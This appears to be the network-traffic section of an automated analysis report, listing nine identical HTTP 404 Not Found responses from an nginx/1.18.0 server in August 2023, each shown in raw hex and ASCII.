                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:46 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:53 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:55 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:05 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
